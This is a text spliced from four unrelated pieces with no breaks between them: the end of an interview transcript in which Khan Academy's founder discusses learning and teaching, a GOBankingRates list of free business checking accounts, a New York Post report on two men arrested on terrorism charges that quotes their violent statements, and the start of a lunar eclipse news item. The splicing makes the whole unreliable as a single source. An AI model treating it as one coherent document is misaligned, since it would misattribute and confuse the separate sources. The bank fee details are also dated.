It needed YouTube and all of that , but it also needed the web for my own preparation because in the old days you only had one source .
You had your textbook or whatever , and that ’s very limiting .
Now , you literally have textbooks .
You have things like Wikipedia .
You have random professors .
You have random people on the web , explaining concepts .
You know , 90 percent of them are explaining it the same way , but that 10 percent , they ’ll say something and it just clicks in your brain .
Oh , why did n’t everyone just say that ?
And then , you have all these others .
I ’m actually a big fan of – well , this is actually a commentary of the publishing industry .
I think textbooks are written , not to teach .
Textbooks are written to impress school boards and to be these impressive weighty tomes , as opposed to something that a student could digest .
I actually think a lot of the whatever , a teacher sells books that arein the library for $ 10 or the “ Barrons Calculus ” or the easy way , “ Biology the Easy Way . ”
These are actually really good text .
They should n’t be downplayed .
You start with something like that , and then when you have questions , OK , that kind of gave me the overview .
But I still do n’t understand exactly what happens at this stage or that stage .
Then , you can use texts as reference , dig deeper , use Wikipedia as a reference .
And when I really get to some really core question , I was doing immunology which I ’m not an expert in .
In one part of my wife ’s immunology textbook , she ’s a doctor , so she has her immunology textbook from medical school .
And I was leafing through it .
In one part of it , it was saying , “ B cells , they need to be exposed but they need to be exposed to the antigen to be activated . ”
And in another part it says , “ Oh , helper T cells activate B cells . ”
I was just like , “ Do both have to happen or just one of them ?
And I could n’t find it anywhere .
I could n’t find my answer , so I just literally called up a friend who ’s the professor of virology at Duke , and I asked him .
Look , I know this is a really stupid question , and you ’re going to judge me because why does Sal – I should be doing immunology because if I do n’t know the answer to this question , and I asked him .
He said , “ Actually , that ’s a very interesting question .
There ’s certain types of B cells .
It ’s an area of research and why that is and this and that .
It ’s completely not in the textbook . ”
And so , very quickly as long as you ’re really kind of asking yourself the right questions and you really are focused on getting down to a distilled intuition of a subject , it does n’t take long before you can really get to kind of fundamental questions that even experts in the field say , “ Hey , that ’s interesting . ”
This is another .
I talk to a lot of friends who have PhDs , are professors , or doing pieces or whatever , and sometimes – I ’ll meet them at a party and I ’ll be do a video on this probably next week , and I have this one question about this , like a fundamental concept , something that a first year grad student should know .
And they ’re like , “ You know what ?
That ’s something I always wondered , but I really did n’t have time to address it in my education .
And I had qualifiers to pass , and I was probably embarrassed to bring it up inside of my department .
And so , I really do n’t know the answer to that . ”
One , I mean , it makes me feel a lot better .
But , then we would come on a mission combined to get that question answered , and I would be kind of their lay person to say , “ Hey , this guy ’s wondering . ” I do n’t know .
If you want to know where I think I ’m heading now , beyond people who have spent more time in the field is that I have the luxury of spending as much time as I want on core concepts .
And I think core concepts are the most important because that ’s where you build your intuition level on the subject .
When I started doing chemistry , before I even started , I just played with the periodic table for , like , a week just to make sure I understood the nuance of why was it structured that way , why is the pattern .
How did it come about as opposed to it ’s just there and how do you interpret it ?
How did the first people even think of making a periodic table , things like that ?
I get that luxury , and PhDs and grad students and professors do n’t have that luxury of really understanding .
I have n’t done mechanics videos yet , and I have a friend who was explaining to me a little bit .
He ’s like , “ Oh yeah , if you have this electron , it ’s moving in this chamber , this theoretical chamber . ”
I was like , “ Why is it moving ?
What is it changing directions ? ”
And he ’s like , “ That ’s a good question . ”
It ’s like one of these fundamental examples that every first year quantum mechanic student learns , and the teacher does n’t go over that .
They just say , “ Oh , you get the equation .
You learn to mimic it ” and so on and so forth , but everyone ’s afraid to ask these very basic questions .
I ask them .
Eventually , I get an answer to them .
And I think when I teach it , I ’ll answer those questions and then people wo n’t have those gaps in their heads .
Andrew :
It seems like the Khan Academy is great for teaching Khan , for teaching you because you now are going through the ideal university .
Can you talk about how knowing that you ’re going to teach what you ’re learning , the facts which you ’re learning , how it impacts ?
Interviewee : Oh , yeah .
Well , you know , it puts the bar so much higher .
I ’m going to start organic chemistry pretty soon , and when you ’re taking organic chemistry and I took organic chemistry in college , your goal is really to get an A .
And if you ’re especially intellectually inspired , maybe , you ’ll get another level of understanding .
But there ’s all these other pressures that are going on in college , your grades and social pressures in other classes and all of that .
Now , I know I ’m going to explain it , and I know from the math videos , there ’s a certain brand , there ’s a certain standard that people expect , that I ’m not just going to throw something at you and say , “ Memorize this . ”
Or I ’m not just going to say , “ This is beyond you .
Do n’t try to understand it . ”
The standard people expect from me is that I will give them an intuition , and I will distill it down to a concept where people say , “ Oh , wait .
That ’s obvious .
That ’s all that thing is saying about the universe . ”
And so , that ’s the standard I hold myself to when I learn it , so it does n’t take long actually to learn something of a level where you can get an A on most exams in most schools .
But , it ’s a whole other level where you ’re getting to the really deep why is this intuitive , or why does that expression look the way it does ?
Or how is it related to another expression ?
And so , it ’s usually motivating while I ’m learning .
It keeps me going a little bit deeper than I think most anyone would , if they were just doing it for getting a credential .
Andrew :
Do n’t medical schools teach by showing , doing teaching method where the student gets to learn it , gets to do it and then has to teach it to someone else because when you teach it , you really absorb it ?
Interviewee : Yeah .
No , I ’m a huge believer of that .
When I talk about the virtual school , that ’s why I think the peer - to - peer is huge .
I think mastery comes , not just from being to do a lot of problems , it really comes from that exercise of teaching it .
I found it with my own experience , but if you have kids all over the world teaching each other , that ’s why you have that one room school house all of a sudden .
I think you ’re just going to have a whole other level of mastery that does n’t exist right now .
Andrew :
All right .
So , how do you teach ?
How do you teach tough topics ?
Teach us how to teach because we ’re all going to have to teach our employees , or we ’re going to have to teach people who we work with .
We ’re going to have to teach others online .
Interviewee : Right .
Well , I think that there ’s a couple of things here .
You brought up an interesting point because now when you talk about teaching employees and teaching others .
I ’m actually advising some tech companies where they want to build Khan type applications of their platform and this and that .
At first , I was writing traditional specs , like you would expect a product manager or whoever would write at a company .
This is silly .
I do YouTube videos .
Why do n’t I just do YouTube specs ?
So , I went and literally made a screen shot and played with what the interaction should look like .
It ’s ten times better .
So , I think to a large degree , just the forum factor makes it way better than if I were to write a white paper , white a spec or even if I were to stand at a white board and use my hands and face .
So , one , the forum factor , the screen capture , hand drawn writing is pretty powerful .
Some people told me that cognitively just seeing typing or seeing a PowerPoint presentation does n’t really stimulate the brain .
But seeing someone write something out , handwritten , it actually does .
I kind of feel like that .
It ’s actually easier for me to produce .
Beyond that , what I do is just get as comfortable as you possibly can with the subject , but once you get that comfort , do n’t script the video .
Make it as relaxing as possible .
Have fun while you ’re doing it .
There ’s actually a gentleman who ’s going to start translating some of the videos to Urdu .
In my one feedback , he did some great videos , but I was like , “ Have more fun . ”
Our energy carries over in our voice , especially when you do n’t see the face .
You really have to have a lot of energy in your voice , and if you ’re not having fun , the student wo n’t have fun .
And so , have fun .
Be relaxed but really know what you ’re talking about .
Like , do n’t throw out buzz words without really knowing what is going on behind it .
So , if you ’re at a company , I actually think the way that Khan Academy teaches , it ’s actually the ideal .
Instead of white papers , instead of a lot of what goes on inside of companies to teach people how to do things , just teach your peers and teach it as it really is .
Do n’t try to look smart yourself by throwing our buzz words that you do n’t necessarily understand or that you heard someone else say .
And you think it ’s smart to say .
Just say it in as down to earth of a style as you can .
Be frank if there ’s something that you do n’t understand , and I think that people will respond well to it .
Andrew :
What about the way that you give background before you get into the subject ?
How do you do it ?
Interviewee : Well , I think through this process of making 1500 videos , I ’ve gotten very good at being train of thought .
I think a lot of people when they teach , they actually close down .
They actually shut off a lot of their thoughts that would be , maybe , embarrassing , like , when I do a problem , there is a bit of a neuron that reminds yourself that a negative times a negative is a positive .
Maybe , even remind yourself why that is .
Remind yourself all of these things while you ’re doing the problem .
I lay all that stuff out there .
So , even if you ’re watching the vector calculus videos , I do n’t assume anything .
I really doing stream of conscious .
Every thought that ’s going into my brain , you ’re actually getting on paper .
So , there ’s no skipped steps , if you will .
I think there ’s that .
Before I do the video , I do try to really make sure I understand the big picture really well .
And probably , what we ’re talking about when I give the background , that ’s me articulating the big picture .
So , I have a framework in my head of what we ’ve even doing .
I think a lot of times in all subjects , once you start getting into it , you almost forget what you ’re doing in the first place .
While I ’m doing it , I like to , like what have you been doing ?
We ’re on step 50 of this equation .
What was the whole point to begin with ?
So , it ’s good to remind yourself at the beginning .
It ’s not some artificial teaching technique .
It ’s literally , I ’m reminding myself .
I ’m reminding myself this is why we ’re doing this problem right now .
I think it ’s valuable for the student .
I think whatever keeps my energy level up while I do the video will also keep up the engagement and the energy level of the person observing the video .
Andrew : I see .
People have to get that French Revolution .
I can recommend it before I even finish watching it .
It was so good .
You even gave us a little bit of background , and you said , “ Well , the French supported America in the American Revolution . ”
Wow , I would n’t have thought to have included some like that , but it really does help me understand what ’s about to happen here .
It ’s a great reminder .
How do you make it feel interactive when it ’s just you and it ’s not even your face in the video ?
How do you make it feel like you ’re engaging the person ?
Interviewee : I think there ’s a couple things .
Once again , when we talked about the forum factor , how it looks , but it ’s also the videos are on average about ten minutes .
These history videos go a little bit longer than that .
But , I think because it ’s ten minutes , the person goes into the video watching that video .
So , it ’s not like they ’re getting a 90 minute lecture which may engage them for part of it .
It ’s almost like the act of clicking on a video is almost like asking a question .
Like , tell me more about the French Revolution or tell me more about the Napoleonic campaigns in Russia .
And so , it ’s literally just addressing that exact video that you have right there , and the other thing is I think it ’s the forum factor .
It ’s a little bit of a my tone .
I ’m a little conversational .
Literally , the tone I use in the video is not at all different than the tone I ’m using right now .
It ’s not at all like a lecture .
The next step of this – it ’s not that at all .
Andrew :
How many of them do you do a day ?
Interviewee : Depends what I ’m doing .
When I was doing French Revolution or some of the more complex biological , biochemistry type mechanisms , then I ’m lucky to be able to do two or three in a day .
And there ’s other things that are taking up my time now which I ’m trying to shut off .
Running an organization , I ’m trying to automate as much of that as possible .
Right now , I ’m doing a lot of worked examples for the Monterey Institute in Algebra I , worked examples where they just gave me a bunch of examples .
I said , “ Yeah , I ’ll do them for you as long as I can put them on the Khan Academy . ”
These are literally just algebra problems .
I ’m doing , right now , about ten videos a day for the algebra problems .
Andrew :
Who is this for ?
The Monterey …
Interviewee : The Monterey Institute of Technology and Education .
They got a grant to build this course and this and that .
This is another interesting thing .
Going back to what we talked about in the beginning , a lot of people in the world are talking about making open video content available , and we should get good teachers to put stuff up and we do all this analytics .
When it comes to execution , they had gotten this and I told them , “ I do n’t know what you ’re doing or how much money you ’re spending on it .
But whatever you ’re spending on it , I ’m sure I ’ll be able to do it for a tenth of the cost as long as you ’re willing to donate it to Khan Academy , and I think you ’re going to find it more engaging because it ’s not going to be scripted .
They were like , “ Oh great .
That ’s no problem .
We can send you the scripts . ”
I said , “ Do n’t send me the scripts .
It will ruin everything that ’s good about the Khan Academy .
And so they sent it , and over ten videos a day you very quickly turn out about 100 videos in not too long and they ’d be done .
I think when they started , they thought it was this huge grand project and the little lectures will be done in a couple of weeks .
Andrew :
One other question here , and I was n’t sure if I should ask it or not .
But I ’ve got to ask it because I think it ’s important .
You and your wife moved to one of the most expensive parts of the country .
Here , you are living in Northern California .
You ’re living around people who are making tons of cash .
I ’ve got to believe you ’ve got some expectations of lifestyle and your wife does , too .
And suddenly , you come home in September , and you say , “ Honey , I quit . ”
How do you deal with that ?
What ’s the story there ?
Interviewee : Well , I think the Sal before marriage and before son would have been much more obsessed with keeping it up with the peers in terms of lifestyle and all of that .
When I really seriously introspect on where I find joy in my life , it really does not come from – I have saved enough from my hedge fund days but not a lot from my value standards .
But enough for me to not feel like living off of savings for a year was going to kill us or prevent my kid from going to college or anything like that .
So , I ’d saved enough there , and we live in a 2200 square foot house in a nice part of Mountain View which is not the fanciest neighborhood , but it ’s a really nice neighborhood and the weather ’s good .
Andrew : Did you have to convince her ?
Did you have to explain to her , “ Listen , I got to do this ” or did she understand ?
Interviewee :
The first few iterations when I thought about it , she was very like , “ Wait , you ’re going to give up that job where every year you ’re making 50 percent more than the year you made before . ”
The thing about these careers , like hedge funds or banking or anything is , “ Hey , stick around .
Next year you ’ll be making more than you made the last five years combined . ”
My wife is not materialistic at all , but for anyone it ’s like , “ Gee , that would really like not only allow us to buy a nice house and then we can even support our parents . ”
There ’s all sorts of things .
You can always think of more things to do with resources , but when you really sit down and think .
I used to play a game with a lot of friends , like how much is enough , right ?
Like , how much – like , what do you need so that you do n’t really need everything and anything above that is just gravy and some type of competitive whatever , who knows ?
People out here , they throw out five million , ten million , 15 million .
That ’s way above enough .
For me , it was below seven figures .
I ’m not taking a salary with Khan Academy .
I quit my job , convinced that gee , I ’m a complete dummy if I do n’t convince someone that this is the highest return on social investment .
I mean , for the cost of a pre-school , we can be educating millions of people for all of time .
It ’s not even like a school where if the funding dries up the school disappears .
No , the content will be there .
It will be there on iTunes and YouTube forever .
I said , gee , I ’ve got to be able to convince somebody .
And being in the valley has been a big benefit there because I think people here , more than anywhere ; one , there is capital .
People have resources , and they see that .
They ’re not as swayed by the touchy feely nice picture and please give some money and help .
They understand things that scale .
They understand when there ’s something that has broad impact .
They understand a return on investment .
And so , yeah .
I kind of veered off track a little bit , but I think the simple answer is I had enough , enough was below seven figures but enough that I could put a down payment on a four - bedroom house in Mountain View .
We have two relatively new Hondas , and I ’m now able to take a salary from Khan Academy .
You know , I tell people , “ If you wrote me a check for five billion dollars five years ago , I would have probably bought a house , maybe , a little nicer than this house .
But my day would have been spent making YouTube videos .
It would n’t have changed , and now I get to do it anyway .
So , why chase the five billion dollars which already probably would have been happening anyway , and I probably will just end up 40 or 50 years old just probably with some amount of money in my bank and just say , “ What have I done ? ”
Now , in Khan Academy I come in every day and I ’m excited about what I ’ve done .
These videos , kids are already watching it .
This is turning into beginning a momentum .
It could turn into a new type of school .
It boggles the mind .
I tell my wife every day and every night I ’m boggled by how fortunate I am that this wide open opportunity to do something really big is just there .
And no one ’s been doing it .
I want more people to do it .
I do n’t want it to be like , only Sal .
But it ’s this wide open opportunity to really change things , and all the technology is kind of falling into place .
And I think the way to do it is on a not - for - profit because that ’s what allowed all of the inertia and the good will and actually kept me straight in terms of my goals .
I think that if I did it on a for - profit basis , very quickly I ’d be like , oh , in order to monetize it .
I have to go to this part of the market , and I start charging for some part that I should and that people would n’t even learn .
You experienced a Khan Academy video .
Now , that ’s a really good video .
If I put even a 50 cent barrier on the video , you would never have experienced it .
For me , that would n’t have been fun .
Let ’s look at this way .
If I had ten million dollars in the bank and 5,000 people watching these videos versus I have a hundred grand in the bank and 50 million people are watching the videos , that is a much more satisfying outcome for me than the former .
So , that ’s why I ’m doing it like this .
Andrew :
This is an incredibly inspiring story .
I ’ll leave it there .
I am grateful to you for coming here and doing this interview .
I know you probably could have whipped up five different videos today for Khan Academy .
Interviewee : Oh , no .
I have to catch up now .
Andrew : Sorry ?
Interviewee : I have to catch up now .
Andrew :
You have to catch up now .
A few people , as we were talking , came up with suggestions as to what you should do to tweak your YouTube video panel to get more viewers .
I could n’t understand it well enough to explain to you what they were suggesting .
Are you open to those suggestions if they email you directly ?
Interviewee : Yeah .
Well , there ’s a couple of ways .
They should email me at sal@khanacademy.org .
And the software piece is an open source effort , and the few developers who start working on it , they ’re rock stars .
I ’m very open .
They ’re , “ Hey , your knowledge map that you drew out , it should have arrows instead of arcs . ”
Forget them , I put arrows in there .
I ’m a big believer in stuff out there and keep repeating as quickly as possible .
As long as the people iterating it are n’t doing really silly things , it should move forward .
Andrew :
All right .
Well , thanks guys .
If you have any feedback , any suggestions , want to be part of this in any way , sal@khanacademy.org , right ?
But you also have the dotcom .
Interviewee : No , I do n’t .
Somebody claimed the dotcom .
I do n’t own the dotcom .
Andrew :
Who is the evil son of a bitch who has the dot com , who does not …
Interviewee : Well , I do n’t know .
I was almost able to get it , and someone got it .
I do n’t know .
There are people more sophisticated at squatting domain names than I am .
Andrew : I guess so .
Somebody get that domain name back for him .
If anyone out there is listening , get that domain back .
All right .
Thank you .
And also , thanks for doing this interview .
I ’m really looking forward to this weekend watching your videos .
Interviewee : Oh , great .
Thanks a lot .
Andrew : Cool .
Bye .
This transcription brought to you by SpeechInk.com .
When operating your own small business , every penny counts .
You probably do n’t want to incur a fee month after month in order to write checks for supplies or pay your employees .
You also do n’t want be subject to any hidden fees .
GOBankingRates surveyed financial institutions to help you find the best small business checking accounts for your company — checking accounts that are truly free .
Here are the 20 best free checking accounts :
Learn : 6 Reasons to Open a Business Checking Account
More From Your Money
Best Free Business Checking Accounts
None of these accounts charges a monthly fee , and each offers free online banking .
Here are more details on the 20 best free checking accounts :
Liberty Bank PayBack Business Checking
Offering unlimited transactions at no additional cost and a low minimum $ 25 deposit requirement , Liberty Bank ’s PayBack Business Checking account is one of the best .
Customers get a complimentary Business MasterCard debit card with no ATM fees .
Liberty will even refund your account for any ATM fees that were charged to you by another bank .
Additional features include :
Complimentary eStatements for quickly reconciling your account
24 - hour LibertyLine telephone banking
Free BizLink Online Banking with bill pay
Live customer service access six days a week
BBVA ClearConnect
Consider BBVA ’s ClearConnect account when searching for the best free business checking account .
You ’ll never have to worry about paying debit or ATM fees , and there ’s no minimum monthly account balance requirements to worry about .
The bank provides up to three complimentary , personalized Visa Business debit cards , as well as free bill pay and five in - branch withdrawals per month at no extra cost .
More From Your Money
Additional features include :
Checks discounted by 50 percent
One free wire each month
One Overdraft Fee Forgiveness
Refund per year
Unlimited no -cost digital transactions
Free account alerts
Related : What Is a Business Money Market Account ?
Bremer Bank Bremer Classic Business Banking
If your small business is just starting out or you ’re just looking for a simple free checking account , then the Bremer Class Business Banking account is your best bet .
You ’ll enjoy not having any minimum balance requirements and never having to pay monthly service charges .
The company also offers online banking , mobile banking and bill pay plans that you can add to your basic business checking plan .
Additional features include :
No charge when using MoneyPass ATMs
Free Business MasterCard debit card
Interest earned on balances over $ 500
Great Western Bank Primary Business Checking
Great Western Bank ’s Primary Business
Checking scores points for having no minimum monthly balance requirements and no monthly service fees .
The bank does charge $ 4.95 for paper statements , though .
Customers can avoid this fee each billing cycle by signing up for electronic statements instead .
Another way to save is to take advantage of phone banking , which is provided for free .
More From Your Money
Additional features include :
Complimentary bill pay
No charge for in - network ATM usage
Free access to Visa Checkout
300 free transactions per month
FirstBank Free Business Checking
FirstBank ’s Free Business
Checking customers are welcome to do business at any of their 115 branches or 200 ATMs .
The free business checking account includes online banking , which is complimentary when you sign up for eStatements .
No minimum monthly balance is required and you ’ll pay no service charges .
Customers are also allowed to make 150 transactions per month without incurring any fees .
Additional features include :
24 - hour banking by phone
Text and email alerts
Mobile app with mobile deposit and Apple Pay
BNC National Bank Free Business Checking
Choosing to open a BNC National Bank ’s Free Business Checking account means you ’re eligible for a complimentary gift .
The account never charges a monthly service fee and does n’t have any minimum balance requirements .
The bank will even buy back any old checks or debits cards you no longer need .
Customers who wish to keep their accounts fee - free must insure they do n’t go over 1,000 transactions each cycle or deposit more than $ 10,000 per month .
More From Your Money
Additional features include :
Free business checking online with bill pay
Visa Business debit card
No charge for monthly statements
First National Bank of Omaha Business Free Checking
First National Bank of Omaha ’s Business Free Checking account has no minimum deposit requirements to open an account .
Customers are also not held to any minimum balance each cycle , although they ’re charged a $ 0.25 per item fee after the first complimentary 150 free transactions of the month have been made .
Additional features include :
$ 200 credit for mortgage closing costs
Complimentary account alerts
Free online banking with bill pay
Iberia Bank Free Business Checking
With no monthly service fee and no minimum balance requirements , Iberia Bank ’s Free Business Checking is an attractive option .
Customers only need $ 100 to open an account , which comes with free eStatements for easy account management .
Business owners will also love the fact that by opening a free small business checking account they ’re eligible to have all fees waived on up to two personal checking accounts .
Each cycle , up to 500 transactions and $ 10,000 in deposits are permitted within the business checking account at no extra cost .
More From Your Money
Additional features include :
Free Visa Business debit card
Complimentary online banking with bill pay
Free email alerts
Complimentary mobile and text banking
ANB Bank Business Free Checking
ANB Bank ’s Business Free Checking account can be opened with as little as $ 25 .
After that there are no monthly service charges .
Customers are welcome to make up to 150 transactions for free , however , transactions above that are $ 0.50 per item .
The bank does charge $ 5 for every paper statement fee , but you can avoid this fee by signing up for free eStatements .
Additional features include :
Complimentary business debit card
Free check safekeeping
Complimentary eStatements
No ATM fees
Flagstar Bank SimplyBusiness Checking
FDIC - insured Flagstar Bank ’s SimplyBusiness Checking gives customers a sense of security .
The plan offers a break from minimum monthly balance requirements and monthly maintenance fees .
Customers can open an account with a $ 50 deposit and make as many as 200 transactions per cycle without incurring any fees .
Monthly statements are free , including images of your checks .
Additional features include :
24 - hour telephone banking
Complimentary Visa debit card
Bounce protection
Read : 6 Reasons to Open a Business Checking Account
More From Your Money
Hancock Whitney Bank Essential Checking
Small businesses that keep lower account balances and do n’t encounter a large number of transactions per month would do well with the Hancock Whitney Bank Essential Checking account .
The plan has no monthly service fees and allows for 100 transactions and deposits of up to $ 5,000 a month .
Electronic statements are complimentary , but paper statements cost $ 3 each .
Customers also have the option of adding overdraft protection through either a savings account or business line of credit .
Additional features include :
Visa debit card with Apple Pay access
Customer service six days per week
Overdraft protection when linking to a business line of credit
10 percent discount on your first order of checks
Email notifications
Comerica Bank Basic Business Checking
No monthly maintenance requirements and zero monthly service charges puts Comerica Bank ’s Basic Business Checking plan on the best business checking accounts list .
This bank is ideal for small businesses that have less than 75 transactions a month and deposit less than $ 2,500 each cycle .
Customers will love the fee - free Comerica Web Banking for Small Business .
With each account comes one year of complimentary Comerica Web Bill Pay .
After that the service costs $ 6.95 month .
Additional features include :
Free Comerica business debit card
Credit card and payroll processing
Old National Bank Free Business Checking
The Old National Bank ’s Free Business Checking comes with a free Business debit card .
This card has a number of benefits that make the account extremely attractive .
First , customers will enjoy the Visa SavingsEdge that lets you earn cash back on qualifying purchases .
Second , when using the debit card , you ’ll have zero liability protection against fraudulent use of your card .
Third , you ’ll have complimentary travel and emergency assistance services should you experience trouble like a flat tire or running out of gas .
Finally , the card comes with purchase security and extended protection .
Additional features include :
No minimum balance requirements
Online and mobile banking
First 200 transactions a month are free
Bank of the Ozarks Free Small Business Checking
Open your Free Small Business Checking account at Bank of the Ozarks with $ 100 and enjoy zero minimum balance requirements and no monthly service fees .
The first 250 transactions on the account each cycle are complimentary with a $ 0.50 charge for each item above 250 .
Customers will love the free eStatements , as well as the overdraft protection and the Re$ubmitIt Check Recovery Program .
Additional features include :
Instant issue debit card
Complimentary mobile banking with remote capture deposit
Free online banking with bill pay
Merchant processing
Bank of Internet USA Basic Business Checking
Although Bank of Internet USA Basic Business Checking requires a $ 1,000 opening deposit , it comes with a set of 50 checks at no charge and has zero monthly maintenance fees .
The first 200 transactions each month are complimentary with a charge of $ 0.30 per item after that .
Customers will also get 60 free remote transactions per statement cycle .
Additional features include :
No charge for in - network ATM usage
Complimentary image statements
Free bill pay
Read : 5 Best Banks for No Fees
Ameris Bank Business Checking
Ameris Bank ’s Business Checking account has zero monthly maintenance costs and can be opened with a $ 100 deposit .
Each account gets 200 free transactions each month with a charge of $ 0.25 for every item over that 200 .
Customers can also make deposits of up to $ 10,000 per cycle without any fees .
Paper statements cost $ 2 , but eStatements are always free .
When you order your first batch of checks , you ’ll enjoy a 20 percent discount .
Additional features include :
Complimentary online banking with bill pay
Automated telephone banking
No fees at any Ameris ATM
Unlimited check writing
Mobile banking with mobile check deposit
Free Ameris Bank Visa debit card
Zions Bank Basic Business Checking
Start your Basic Business Checking account at Zions Bank with $ 100 and then stick to 150 transactions with $ 5,000 deposits or less and you ’ll enjoy free business checking .
The account does n’t have any maintenance fees or monthly maintenance requirements .
Paper statements cost $ 2 each month , but customers can choose complimentary eStatements to keep their accounts free .
Every account comes with a business debit card that is linked with Zion ’s AmaZing Deals , which allows you to earn cash back on qualifying purchases .
Additional features include :
Complimentary online banking
Positive Pay fraud protection
Merchant and payroll services
Option to add overdraft protection
First Citizens Bank & Trust Company Basic Business Checking
No maintenance fees and zero minimum balance requirements make First Citizen ’s Bank & Trust Company ’s Basic Business Checking worth a look .
You can open an account with as little as $ 100 .
Up to 175 transactions are free each billing cycle with no charge for deposits up to $ 5,000 .
Customers can access their accounts online using the BOB Advantage .
This services makes it a cinch to pay bills and comes with security and fraud protection .
Additional features include :
Free use of First Citizens ATMs
Complimentary Visa Business debit card
Free eStatements
Arvest Bank Free Small Business Checking
Arvest Bank ’s Free Small Business
Checking does n’t charge monthly maintenance fees and offers the option to enroll in electronic statements at no cost ; otherwise you ’ll pay $ 5 for each paper statement with images .
Each month , 100 transactions are included for free ; any transactions beyond that cost $ 0.50 each .
Electronic debits and credits , however , are unlimited .
Customers will love the complimentary use of Arvest ’s Online Banking platform , which provides 24 - hours of account access , a way to reorder checks , and a secure method to contact customer service .
Additional features include :
Overdraft protection of up to $ 400
Complimentary Arvest debit card
Free online bill pay
Cathay Bank Business Checking
When you compare business checking accounts , you ’ll find Cathay Bank ’s Business Checking ranks among the best .
This bank allows customers to open an account with $ 200 and never charges a monthly maintenance fee .
There are also no minimum balance requirements .
Customers will have a limit of 150 checks paid at no cost with a charge of $ 0.25 per item afterward and a limit of 25 deposits for free with a charge of $ 1 per deposit beyond the limit .
Additional features include :
24 - hour telephone banking
Free business bill pay services
Business Online Banking Service
Related : Chase , Citi and 9 More Best Business Credit Cards
Taking the time to examine the 20 best free business checking accounts is a great way to find the plan that works with the specific needs of your company or small business .
You wo n’t have to worry about being charged any hidden fees and you can put the money you save from not having maintenance costs back in to your business .
To determine the best free business checking accounts , GOBankingRates scored each checking account from most to least favorable for the following factors : ( 1 ) minimum deposit to open the checking account ; ( 2 ) number of free transactions allowed per month ; ( 3 ) 24/7 customer service availability ; and ( 4 ) customer service live chat availability .
This content is not provided by the financial institutions mentioned .
Any opinions , analyses , reviews or recommendations expressed in this article are those of the author ’s alone and have not been reviewed , approved , or otherwise endorsed by the financial institutions reviewed here .
GOBankingRates is a personal finance and consumer interest rate website owned by ConsumerTrack , Inc. , an online marketing company serving top - tier banks , credit unions , and other financial services organizations .
Some companies mentioned in this article might be clients of ConsumerTrack , Inc. , which serves more than 100 national , local and online financial institutions .
Rankings and roundups are completely objective , and no institution , client or otherwise , paid for inclusion or specific placement .
Any opinions , analyses , reviews or recommendations expressed in this article are those of the author ’s alone and have not been reviewed , approved , or otherwise endorsed by the companies included in the article .
All fees and rates are subject to change at the insurers ’ discretion , and some bonus offers might no longer be available on the insurers ’ websites , depending on how you access the web page .
They were the hate - filled , homegrown terrorists next door — ready to cut your head off if they got the chance .
“ They only fear you when you have a gun and when you , when you start killing them and when you take their head , and you go like this , and you behead it on camera , ” hissed terrorist wannabe Mohamed Alessa , 20 , of North Bergen , NJ , during an undercover operation in 2009 , a federal complaint unsealed yesterday revealed .
“ My soul can not rest until I shed blood . ”
Alessa and Carlos Eduardo Almonte , 24 , of Elmwood Park , NJ , were busted at JFK Airport on Saturday night , trying to leave the country on separate flights for Cairo , allegedly en route to Somalia for training to kill Americans overseas — and back at home .
NYPD Commissioner Ray Kelly said there was “ a scuffle ” when Alessa refused to get down on the ground .
VIDEO : JIHADISTS IN TRAINING ARRESTED
BRAVE COP NAILED ‘EM
SUSPECTS HOT FOR PREACHER
AIRPORT ARRESTS TAKE OFF
VIDEO : NYPD CHIEF ON JFK TERROR ARRESTS
The pair viewed the move as a stepping stone to terrorist stardom , authorities and friends said .
“ We ’ll start killing here , if I ca n’t do it over there , ” Alessa , the son of Palestinian - Jordanian immigrants , said , according to the complaint .
“ Freaking Major - Nidal - shaved - face - Palestinian - crazy guy , he ’s not better than me , ” Alessa allegedly said , referring to Army Maj .
Nidal Hasan , the shrink who gunned down 13 fellow soldiers and injured scores more at Fort Hood in Texas .
“ I ’ll do twice what he did .
I wanna , like , be the world ’s known terrorist . ”
Not to be outdone , Almonte — a native of the Dominican Republic who had converted to Islam and started calling himself Omar — allegedly said he wanted to send Americans home “ in caskets . ”
“ Any Muslim that gets . . . even a 10 percent out of 100 chance of [ waging jihad ] should risk it . . . because [ it ’s ] better than sitting back here and working like a dog . . . and being somebody ’s puppy , ” Almonte seethed , according to the complaint .
Almonte also allegedly boasted , “ I ’m gonna get a gun .
I ’m the type of person to use it anytime . . .
I ’ll have more bodies on it than . . . the hairs on my beard .
You know what I ’m saying ?
It ’s already enough that you do n’t worship Allah , so . . . that ’s a reason for you to die . ”
The suspects were set to appear in federal court in Newark on terrorism charges today .
They face life in prison on charges of conspiring to kill , maim and kidnap persons outside the United States .
They had been under police surveillance since a tipster sent an e-mailed the FBI in 2006 , saying that “ all they look for is all those terrorist videos , ” according to the complaint .
Sources said the tipster was a family member .
The aspiring jihadists wanted to train with the militant Somali Islamic group al - Shabaab , according to the transcripts .
Their undoing was taking an undercover NYPD officer — an ethnic Egyptian in his mid-20s — into their confidence in 2009 and enlisting him in their plan .
Both men ’s descent into hate appears to have begun in high school , where they were loners , former friends said .
“ Once we got to high school , [ Alessa ] got very shady .
He grew out his beard and started dressing differently .
He got picked on because of the way he looked , and he had to quit and go to a prep school , ” said Daniel Forbes , 20 , a former classmate in North Bergen .
“ He always isolated himself from being American . ”
Almonte and Alessa started hanging out with a group troubled Arabic kids who called themselves the Arabian Knights , neighbors said .
“ There was a problem a year or so ago when [ Almonte ] was arrested for smoking pot , ” said neighbor David Castro , 50 , an Army vet who served in Iraq .
“ What bothers me about this is terrorism followed me here . ”
Almonte ’s father , Pedro , a school - bus driver , said he was distraught over the accusations .
“ I ’ve been told not to talk to anyone .
My wife over there is crying .
Her nerves are very bad over all of this , ” he said .
In an interview this morning , he said he did n’t support his son ’s alleged love for terror .
“ I ’m not supporting anything that does something wrong , ” he said .
In 2007 , Alessa and Almonte traveled to Jordan in hopes of being recruited by al Qaeda or sneaking into Iraq , according to the complaint .
They were turned away at the Iraqi border , the complaint said , and al Qaeda never contacted them .
Additional reporting by Steve White , Jamie Schram , Larry Celona , Reuven Fenton and Christina Carrega
perry.chiaramonte@nypost.com
A partial eclipse of the full moon tomorrow may get an added boost of red color from an Iceland volcano 's ash , astronomers say .
Earth 's shadow will be cast across half of the moon 's surface over the course of the three - hour event , which begins 3:17 a.m. PDT on June 26 .
The lunar eclipse will be seen throughout most of the Americas , Australia , and Asia , astronomers say .
A lunar eclipse occurs when the sun , Earth , and moon align .
Unlike during total lunar eclipses , when the entire moon is engulfed in Earth 's darkest shadow , the moon never completely dims during a partial lunar eclipse .
( Take a quiz on moon mysteries and myths . )
